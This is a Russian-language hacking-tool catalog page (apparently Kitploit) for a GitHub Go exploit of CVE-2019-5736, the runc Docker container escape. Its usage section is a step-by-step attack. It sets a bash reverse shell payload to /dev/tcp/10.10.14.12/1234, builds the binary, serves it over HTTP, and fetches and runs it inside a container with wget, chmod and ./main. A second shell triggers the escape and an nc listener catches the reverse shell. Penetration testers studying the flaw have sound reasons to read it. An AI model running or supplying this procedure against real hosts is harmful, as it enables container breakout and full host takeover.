Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-5736 — Эксплойт на Go для CVE-2019-5736 (побег из контейнера Runc) с настраиваемой полезной нагрузкой reverse shell, предназначенный для тестирования на проникновение и операций red team против уязвимых контейнеров Docker. | Kitploit
Инструменты/GitHubGitHub/h3x0v3rl0rd/cve-2019-5736
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеRed TeamingРазработка Полезной НагрузкиПобег из Контейнера
GitHubh3x0v3rl0rd/cve-2019-5736

CVE-2019-5736

Эксплойт на Go для CVE-2019-5736 (побег из контейнера Runc) с настраиваемой полезной нагрузкой reverse shell, предназначенный для тестирования на проникновение и операций red team против уязвимых контейнеров Docker.

Репозиторий
401 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🖥️ -h3x0v3rl0rd- #️⃣ CVE-2019-5736

Использование :

машина уязвима к CVE-2019-5736, следуйте шагам эксплойта Runc (CVE-2019-5736). Загрузите файл main.go, измените полезную нагрузку в файле на:

root@kitploit:~
  var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"

После этого выполните:

root@kitploit:~
  go build main.go

Разместите HTTP-сервер:

root@kitploit:~
  python3 -m http.server

image

Затем откройте 3 терминала, как показано ниже:

image

root@kitploit:~
Терминал 1
  sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
  wget http://10.10.14.12/main
  chmod +x main
  ./main

Терминал 2
  sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh

Терминал 3
  nc -nlvp 1234

как только вы запустите ./main в первом SSH-терминале, сразу же выполните вторую команду во втором SSH-терминале, после чего вы получите обратный shell netcat в третьем терминале

image

image

Скачать инструмент